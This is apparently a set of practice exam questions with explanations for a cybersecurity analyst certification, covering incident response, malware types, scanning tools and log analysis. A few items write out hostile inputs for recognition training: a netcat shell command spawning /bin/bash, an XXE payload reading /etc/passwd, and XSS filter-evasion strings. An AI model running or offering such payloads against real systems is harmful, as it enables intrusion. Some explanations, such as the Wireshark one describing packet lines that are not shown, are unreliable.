Only an approved scanning vendor The Payment Card Industry Data Security Standard (PCI DSS) is a prescriptive framework. It is not a law but a formal policy created by the credit card industry that organizations must follow to accept credit and bank cards for payment. Quarterly required external vulnerability scans must be run by a PCI DSS approved scanning vendor (ASV). This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident? Raw financial information about the company was accessed Forensic review of the server required fallback to a less efficient service PII of company employees and customers was exfiltrated IP addresses and other network-related configurations were exfiltrated

PII of company employees and customers was exfiltrated If the PII (Personally Identifiable Information) of the company's employees or customers were exfiltrated or stolen during the compromise, this would increase the incident's impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company's size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.

You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? POS malware Keylogger Ransomware Rootkit

POS malware Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card's track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.

You're using Burp Suite for web application vulnerability testing but need to extend its functionality. What should be added? Plugins Drivers Scripts APIs

Plugins Plugins are software components that can extend the functionality of Burp Suite, including automated security tasks and additional vulnerability scanning options. While drivers enable hardware-software communication, they do not extend the functionality of Burp Suite. APIs (Application Programming Interfaces) allow different software applications to communicate but do not inherently extend the functionality of a specific tool like plugins. While scripts can automate certain tasks, they do not inherently extend the functionality of a specific tool like plugins.

What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software? Logic bomb Polymorphic virus Trojan Ransomware

Polymorphic virus A polymorphic virus alters its binary code to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection.

You're examining system logs for potential security incidents when you encounter the following command: nc -lvnp 4444 -e (slash)bin(slash)bash What does this command suggest? Directory Traversal SQL Injection Potential Reverse Shell XSS Attack

Potential Reverse Shell The command represents a potential reverse shell using Netcat (nc). It listens (-l) verbosely (-v) on port 4444 (-p 4444) and executes the (slash)bin(slash)bash shell when a connection is made (-e (slash)bin(slash)bash). Cross-Site Scripting (XSS) involves injecting malicious scripts into trusted websites. This scenario involves shell commands, not web-based script injection. Directory traversal involves navigating through a filesystem and is not represented in this command. SQL injection involves the exploitation of a security vulnerability in an application's database layer. This situation involves shell commands, not SQL statements.

Which term refers to the process of determining which vulnerabilities to address first based on their risk scores, impact, and other factors? Intrusion Detection Patch Distribution Prioritization Firewall Configuration

Prioritization When prioritizing vulnerabilities, several factors come into play. The severity of a vulnerability determines its potential impact, with high-impact vulnerabilities, like those granting system control, given higher priority. The likelihood of exploitation also plays a role, favoring vulnerabilities with higher probabilities, such as publicly disclosed ones. Additionally, the cost of remediation influences prioritization, as expensive fixes may require allocation within the organization's budget. By considering these factors, informed decisions can be made on vulnerability prioritization, leading to benefits such as saved resources, improved security, and compliance with regulations. Ultimately, prioritizing vulnerabilities enhances security posture and reduces the risk of attack. This is a process of setting up a firewall's settings to control network traffic, not the process of deciding which vulnerabilities to address first. Intrusion detection refers to the methods used to detect unauthorized access to a system or network. This refers to the process of delivering patches or updates to systems, not determining the order in which vulnerabilities are addressed.

Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation? The location of vulnerabilities The number of vulnerabilities The type of vulnerabilities Prioritizing the risk level associated with each vulnerability

Prioritizing the risk level associated with each vulnerability Risk prioritization is an essential part of vulnerability management, focusing on the most significant threats in a cybersecurity landscape. It involves assessing potential vulnerabilities, considering their likelihood of exploitation, and the potential impact of such an event. After prioritizing vulnerabilities, the highest-risk ones are addressed first, using methods such as software patching or security policy enhancement. This process is continuously revisited and adjusted as new threats and vulnerabilities emerge. The type of vulnerabilities may provide some context, but it is the risk associated with each that should primarily drive prioritization. The number alone does not give an accurate picture of prioritization. Not all vulnerabilities pose the same level of risk. While knowing where vulnerabilities reside is important, it's not the main factor in prioritization. The risk each vulnerability carries is more critica

Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? DiskMon ProcDump Autoruns Process Monitor

Process Monitor Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. Autoruns shows you what programs are configured to run during system bootup or login. ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. DiskMon is an application that logs and displays all hard disk activity on a Windows system. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

Which of the following roles should be assigned to the incident response team? (SELECT FOUR) Public relations Legal Human resources Facility maintenance Management Accounting

Public relations Legal Human resources Management Human Resources has a role to play in that the discoveries made during incident handling may affect employees and employment law. Privacy concerns regarding how to intercept and monitor data may also necessitate HR and Legal involvement. For various reasons, the company may decide to go public with the knowledge of the breach. Therefore, public relations personnel are needed. Management has a crucial role to play in being able to allocate resources to remediate the incident. System administrators and security analysts should also be on the team since they know what constitutes a normal baseline for the systems. In general, positions such as facility maintenance and accounting are not required as part of the core incident response team. In special circumstances, though, they may be asked to augment the team. For example, if a breach of a SCADA/ICS system occurs, the facility maintenance employee who operates and services the machine might be a useful addition. Similarly, if a payroll or accounting system was breached, having an accounting department representative could help the response and remediation efforts.

Taylor needs to sanitize hard drives from some leased workstations before returning them to a supplier at the end of the lease period. The workstations' hard drives contained sensitive corporate data. Which is the most appropriate choice to ensure that data exposure doesn't occur during this process? Clear, validate, and document the sanitization of the drives The drives must be destroyed to ensure no data loss Purge, validate, and document the sanitization of the drives Clear the drives

Purge, validate, and document the sanitization of the drives Purging the drives, validating that the purge was effective, and documenting the sanitization is the best response. Purging includes methods that eliminate information from being feasibly recovered even in a lab environment. For example, performing a cryptographic erasure (CE) would sanitize and purge the drives' data without harming the drives themselves. Clearing them leaves the possibility that some tools would allow data recovery. Since the scenario indicates that these were leased drives that must be returned at the end of a lease, they cannot be destroyed.

Which party in a federation provides services to members of the federation? SSO IdP RP SAML

RP Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties between an identity provider and a service provider (SP) or a relying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.

Dion Training wants to require students to logon using multifactor authentication in an effort to increase the security of the authorization and authentication process. Currently, students login to diontraining.com using a username and password. What proposed solution would best meet the goal of enabling multifactor authentication for the student login process? Require students to choose an image to serve as a secondary password after logon Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password Require students to enter a cognitive password requirement (such as 'What is your dog's name?') Require students to create a unique pin that is entered after their username and password are accepted

Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password All of the options presented are knowledge factors (something you know) except the six-digit number sent by SMS to your smartphone. This SMS sent number is an example of a possession factor or something you have. In this case, it verifies you have your smartphone. By combining this possession factor with the already in use knowledge factor (username and password), you can establish multifactor security for the login process.

Your organization has experienced a cyber attack that exploited a zero-day vulnerability. After the incident, what action would provide the MOST valuable insights to prevent similar attacks in the future? Immediate public disclosure of the incident Increased alert volume Root cause analysis Increased frequency of law enforcement communication

Root cause analysis Conducting a root cause analysis can help understand how the vulnerability was exploited, which is key to preventing similar attacks in the future. While transparency is important, immediate public disclosure without a comprehensive understanding of the situation might not prevent future attacks and could even lead to additional issues. Merely increasing the alert volume may not help prevent future attacks. It's more important to understand the nature of the attack and take targeted actions. Communicating with law enforcement might help with the investigation but wouldn't necessarily prevent similar attacks in the future.

After a security incident has been handled, what post-incident activity involves the detailed examination of the incident to identify the primary cause or causes, often using tools to analyze logs, network traffic, and other data? Lessons learned Forensic analysis Incident response plan Root cause analysis

Root cause analysis Root cause analysis is the process of determining the initial cause(s) of a problem or issue, with the intent to fix the issue by addressing these underlying causes. Lessons learned is a process that follows an incident, where all stakeholders reflect on what happened, what was done well, and what needs to be improved for future incidents. It is broader and less technically focused than root cause analysis. The incident response plan is a strategic document outlining the procedures for handling and managing an incident, not a post-incident activity. While forensic analysis also involves a detailed examination of an incident, it typically goes beyond root cause analysis to include a detailed and systematic examination of all aspects of an incident, often with an eye to legal requirements and implications.

Which of the following lists the UEFI boot phases in the proper order? Security, Pre-EFI initialization, Driver Execution Environment, Boot Device Select, Transient System Load, Runtime Pre-EFI initialization, Security, Boot Device Select, Transient System Load, Driver Execution Environment, Runtime Boot Device Select, Security, Pre-EFI initialization, Driver Execution Environment, Transient System Load, Runtime Driver Execution Environment, Boot Device Select, Security, Transient System Load, Pre-EFI initialization, Runtime

Security, Pre-EFI initialization, Driver Execution Environment, Boot Device Select, Transient System Load, Runtime The security must first prevent any potential contamination from advanced malware from affecting the system as it proceeds into its startup process. The security consists of initializing the code that the system executes after powering on the EFI system. Pre-EFI initialization initializes the CPU, temporary memory, and boot firmware volume (BFV). Driver Execution Environment initializes the entire system's physical memory, I/O, and MIMO (Memory Mapped Input Output) resources. Finally, it begins dispatching DXE Drivers present in the system Firmware Volumes (given in the HOBL). Boot Device Select interprets the boot configuration data and selects the Boot Policy for later implementation. Runtime focuses on clearing the UEFI program from memory and transferring control to the operating system.

You are analyzing the logs of a forensic analyst's workstation and see the following: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- root@DionTraining:/home# dd if=/dev/sdc of=/dev/sdb bs=1M count=1000 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What does the bs=1M signify in the command list above? Sets the beginning sector Sends output to a blank sector Sets the block size Removes error messages and other incorrect data

Sets the block size The dd command is used in forensic data acquisition to forensically create a bit by bit copy of a hard drive to a disk image. The bs operator sets the block size when using the Linux dd command. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

Why is stakeholder identification and communication crucial during an incident response? Stakeholders take on the responsibility of resolving the incident Stakeholders handle communication with the public Stakeholders provide the necessary support and resources for effective incident management Stakeholders analyze the root cause of the incident

Stakeholders provide the necessary support and resources for effective incident management Stakeholders are individuals or groups with a vested interest in the security of an organization. Their support and resources can help effectively manage and mitigate incidents. While stakeholders play a vital role in the incident response process, their main function is not to resolve the incident but to support the incident response team that does. While certain stakeholders may have a role in communicating with the public, it is not their primary responsibility in the incident response process. The task of analyzing the root cause of an incident typically falls to the incident response team or forensic experts, not stakeholders.

An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development? Dynamic code analysis Manual Peer Review Pair programming Static code analysis

Static code analysis Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. DevSecOps methodology would also improve the likelihood of detecting such an error but still rely on a human to human interactions and human understanding of source code to detect the fault. Dynamic code analysis also may have detected this if the test found exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively.

A company has recently experienced a data breach and has lost nearly 1 GB of personally identifiable information about its customers. You have been assigned as part of the incident response team to identify how the data was leaked from the network. Your team has conducted an extensive investigation, and so far, the only evidence of a large amount of data leaving the network is from the email server. One user has sent numerous large attachments out of the network to their personal email address. Upon closer inspection, those emails only contain pictures of that user's recent trip to Australia. What is the most likely explanation for how the data left the network? The data was hashed and then emailed to their personal email account The files were downloaded from home while connected to the corporate VPN Steganography was used to hide the leaked data inside the user's photos The data was encrypted and emailed it t

Steganography was used to hide the leaked data inside the user's photos The most likely explanation is that the user utilized steganography to hide the leaked data inside their trip photos. Steganography is the process of hiding one message inside another. By hiding the customer's information within the digital photos, the incident response team would not see the data being hidden without knowing to look for it inside the seemingly benign pictures from the trip. The scenario did not mention whether or not the user connected to the corporate VPN from their home, and the company should log all VPN connections, so this is not the correct answer. Additionally, the user could not hash the data and email it to themselves without losing the information since hashes are a one-way algorithm. Therefore, even if the user had the hash value, they still would not have the customers' personal information. Finally, according to the scenario, the user's email showed no evidence of encrypted files being sent.

Your company was recently the victim of a cross-site scripting attack. The system administrators claim this wasn't possible since they performed input validation using REGEX to alert on any strings that contain the term "[Ss]cript" in them. Which of the following statements concerning this attack is true? An SQL injection must have occurred since their input validation would have prevented The REGEX expression to filter using "[Ss]cript" is insufficient. As an attacker could use SCRIPT or SCRipt or %53CrIPT to evaded it The server has insufficient logging and monitoring configured The attacker has modified the logs to cover their tracks and prevent a successful investigation

The REGEX expression to filter using "[Ss]cript" is insufficient. As an attacker could use SCRIPT or SCRipt or %53CrIPT to evaded it The most likely explanation is that the REGEX filter was insufficient to eliminate every single possible cross-site scripting attack that could occur. Since cross-site scripting relies on the HTML tags to launch, the system administrators had a good idea of creating input validation using a REGEX for those keywords. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CrIPT would evade this filter. To catch all the letter S variants, you would need to use [%53%%73Ss], which includes the capital S in hex code, the lower case s in hex code, the capital S, and the lowercase s. While it is possible that an attacker used an SQL injection instead, their REGEX input validation would still have allowed a cross-site scripting attack to occurs, so this option must be eliminated. As for the logging options, both are possible in the real world, but they do not adequately answer this scenario. The obvious flaw in their input validation is their REGEX filter.

Considering a scenario where an international space station's proprietary operational software is discovered to have numerous zero-day and critical vulnerabilities, why would the unique implications of these specific vulnerabilities in such a high-stakes and isolated environment necessitate an immediate and expedited response? These type of vulnerabilities pose the highest risk to the environment To empathize the need for higher internet bandwidth Multiple zero-day and critical vulnerabilities implies a need for staff training on new software A large number of zero-day and critical vulnerabilities means that the system is becoming more secure

These type of vulnerabilities pose the highest risk to the environment These vulnerabilities are often exploitable, posing a severe threat to the system, and therefore require immediate remediation efforts. In reality, these vulnerabilities represent significant security risks and should be addressed immediately. While sufficient internet bandwidth is important, the discovery of critical vulnerabilities requires immediate security actions, not bandwidth upgrades. While staff training is a crucial aspect of maintaining a secure environment, the urgent need in this situation is to address the vulnerabilities.

You are an analyst and have been asked to review and categorize the following output from a packet analysis in Wireshark: Source Destination Protocol Length Info 192.168.3.145 4.4.2.2 DNS 74 Standard query 0xaed A test.diontraining.com 4.4.2.2 192.168.3.145 DNS 90 Standard query response 0x3aed A test.diontraining.com A 173.12.15.23 192.168.3.145 173.12.15.23 TCP 78 48134 -80 [SYN] seq=0 Win=65635 Len=0 MSS=1426 WS=16 TSVal=486234134 Tsecr=0 SACK_PERM=1 173.12.15.23 192.168.3.145 TCP 78 80- Based on your review, what does this scan indicate? 192.168.3.145 might be infected and beaconing to a C2 server 192.168.3.145 might be infected with malware 173.12.15.23 might be infected and beaconing to a C2 server This appears to be normal network traffic 173.12.15.23 might be infected with malware

This appears to be normal network traffic This appears to be normal network traffic. The first line shows that a DNS lookup was performed for a website (test.diontraining.com). The second line shows the response from the DNS server with the IP address of the website. The third line begins a three-way handshake between an internal host and the website. The fourth line is the SYN-ACK response from the website to the internal host as part of this handshake. The fifth line is a standard Windows NetBIOS query within the local area network to translate human-readable names to local IP addresses. The sixth and seventh lines appear to be inbound requests to port 443 and port 8080, both of which were sent the RST by the internal host's firewall since it is not running those services on the host. None of this network traffic appears to be suspicious.

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: xml version="1.0" encoding="ISO-8859-1" !DOCTYPE xyz !ELEMENT xyz ANY !ENTITY abc SYSTEM "file: etc/passwd" yada;/yada Based on the output above, which of the following is true? An XML External Entity (XXE) vulnerability has been exploited and its possible that the password has downloaded the file "etc passwd". The application is using parameterized queries to prevent XML injections ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used There is no concern since "etc passwd" does not contain any system passwords

This is an example of an XML External Entity (XXE) vulnerability. Any references to document abc of type xyz may now be replaced with etc passwd, which would allow the user to harvest the data contained within the file. Although in modern Linux operating systems, the etc passwd only contains the usernames resident on the system and not the passwords, this is still valuable information for an attacker. The etc passwd file has been better secured in recent systems by using a shadow file (which contains hashed values for the passwords). Without an input validation step is added to the process, there is nothing to stop the attacker from gathering other potentially sensitive files from the server. While ISO-8859-1 does indeed cover the Latin alphabet and is standard throughout XML, it has no significance from a cybersecurity perspective. A parameterized query is a form of output encoding that defends against SQL and XML injections. This code does not contain a parameterized query.

As part of the preparation phase of the incident management lifecycle, which component involves regularly educating the workforce about potential incidents, how to recognize them, and how to respond? Incident response plan Business continuity disaster recovery planning Training Playbooks

Training Regular training is crucial to equip the workforce with the necessary knowledge to recognize and respond to potential incidents. An incident response plan is a set of procedures to manage and handle an incident. It outlines how the organization will respond to an incident but does not involve the regular education of the workforce. While playbooks provide detailed, step-by-step guides on how to respond to specific types of incidents, they do not involve the regular education of the workforce. While business continuity disaster recovery planning is an essential part of incident management preparation, it does not directly involve workforce education on recognizing and responding to incidents.

A software development company has discovered the ProxyNotShell vulnerability in its product that it cannot fix immediately due to resource constraints. What measures can the company take to mitigate the risk associated with the vulnerability? (Choose TWO) Develop a new software product Use a web application firewall (WAF) to block malicious traffic Use a firewall to restrict access to the affected systems Hire additional developers

Use a web application firewall (WAF) to block malicious traffic Use a firewall to restrict access to the affected systems To mitigate the risk associated with the ProxyNotShell vulnerability, the software development company can configure a Web Application Firewall (WAF) to block traffic related to the vulnerability. By implementing specific rules within the WAF, any malicious traffic attempting to exploit the vulnerability can be identified and blocked, thereby preventing attackers from successfully exploiting the vulnerability. To mitigate the risk associated with the vulnerability, the software development company can configure a firewall to restrict access to the affected systems exclusively for authorized users. By implementing proper firewall rules, the company can control and limit network traffic, preventing unauthorized access and minimizing the potential for attackers to exploit the vulnerability. Creating a new product does not directly address the vulnerability in the existing one. While having more developers might eventually help fix the vulnerability, it does not provide an immediate solution.

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? Installation of anti-virus tools Implement endpoint protection platforms Use of a host-based IDS or IPS User and entity behavior analytics

User and entity behavior analytics Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks? Utilizing an operating system SCAP plugin Utilizing a non-credential scan Utilizing an authorized credential scan Utilizing a known malware plugin

Utilizing an operating system SCAP plugin Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry-standard and support testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known good baseline.

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? You are scanning a CDN-hosted copy of the site The server assumes you are conducting a DDoS attack Nothing can be determined about this site with the information provided The scan will not produce any useful information

You are scanning a CDN-hosted copy of the site This result is due to the company using a distributed server model that hosts content on Edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the Edge server's cache or pull the content from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.

Which of the following tools is considered a web application scanner? Qualys OpenVAS ZAP Nessus

ZAP OWASP Zed Attack Proxy (ZAP) is the world's most widely used web application scanner. It is free, open-source, and provided by the Open Web Application Security Project (OWASP). Nessus, Qualys, and OpenVAS are all classified as infrastructure vulnerability scanners.

Which type of threat will patches NOT effectively combat as a security control? Known vulnerabilities Malware with defined indicators of compromise Zero-day attacks Discovered software bugs

Zero-day attacks Zero-day attacks have no known fix, so patches will not correct them. A zero-day vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). If a discovered software bug or known vulnerability is found, a patch or mitigation is normally available. If a piece of malware has well-defined indicators of compromise, a patch or signature can be created to defend against it, as well.

Which of the following techniques would allow an attacker to get a full listing of your internal DNS information if your DNS server is not properly secured? FQDN resolution Split horizon Zone transfers DNS poisoning

Zone transfers A DNS zone transfer provides a full listing of DNS information. If your organization's internal DNS server is improperly secured, an attacker can gather this information by performing a zone transfer. Fully qualified domain name (FQDN) resolution is a normal function of DNS that converts a domain name like www.diontraining.com to its corresponding IP address. Split horizon is a method of preventing a routing loop in a network. DNS poisoning is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites.

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b

\b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b The correct option is \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b, which uses parenthesis and "OR" operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square braces indicates that any of the letters contained in the square braces are matching criteria. Using the + operator indicates an allowance for one more instance of the preceding element. In all cases, the period must have an escape (\) sequence preceding it as the period is a reserved operator internal to REGEX.

Which of the following Wireshark filters should be applied to a packet capture to detect applications that send passwords in cleartext to a REST API located at 10.1.2.3? http.request.method=="POST" ip.proto==tcp http.request.method=="POST" && ip.dst==10.1.2.3 ip.dst==10.1.2.3

http.request.method=="POST" && ip.dst==10.1.2.3 Filtering the available PCAP with just the http "post" methods would display any data sent when accessing a REST API, regardless of the destination IP. Filtering the available PCAP with just the desired IP address would show all traffic to that host (10.1.2.3). Combining both of these can minimize the data displayed to only show things posted to the API located at 10.1.2.3. The ip.proto==tcp filter would display all TCP traffic on a network, regardless of the port, IP address, or protocol being used. It would simply produce too much information to analyze.

You have been given access to a Windows system located on an Active Directory domain as part of a white box penetration test. Which of the following commands would provide information about other systems on this network? net user net use net config net group

net use The net use command will list network shares that the workstation is using. This will help to identify file servers and print servers on the network. The net group command can only be used on domain controllers. The net config command will allow servers and workstations services to be controlled once they have already been identified. The net user command would show any user accounts on the local Windows workstation you are using.

Barrett needs to verify settings on a macOS computer to ensure that the configuration he expects is currently set on the system. What type of file is commonly used to store configuration settings for a macOS system? .profile files plists .config files The registry

plists Preference and configuration files in macOS use property lists (plists) to specify the attributes, or properties, of an app or process. An example is the preferences plist for the Finder in the Library/Preferences/ folder of a user's home folder. The file is named com.apple.finder.plist. The registry is used to store registration configuration settings on Windows systems. A profile (.profile) file is a UNIX user's start-up file, like the autoexec.bat file of DOS. A configuration (.config) file is a configuration file used by various applications containing plain text parameters that define settings or preferences for building or running a program. This is commonly used in Windows systems.

Which of the following commands would NOT provide domain name information and details about a host? dig -x [ip address] sc [ip address] host [ip address] nslookup [ip address]

sc [ip address] Service control (sc) is a Windows command that allows you to create, start, stop, query, or delete a Windows service. The dig command will give you information on when a query was performed, the details that were sent, and what flags were sent. In most cases, host and nslookup will also provide similar information.

You are troubleshooting a network connectivity issue and need to determine the packet's flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems? ipconfig tracert netstat nbtstat

tracert The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source computer. The ICMP "Time Exceeded" messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.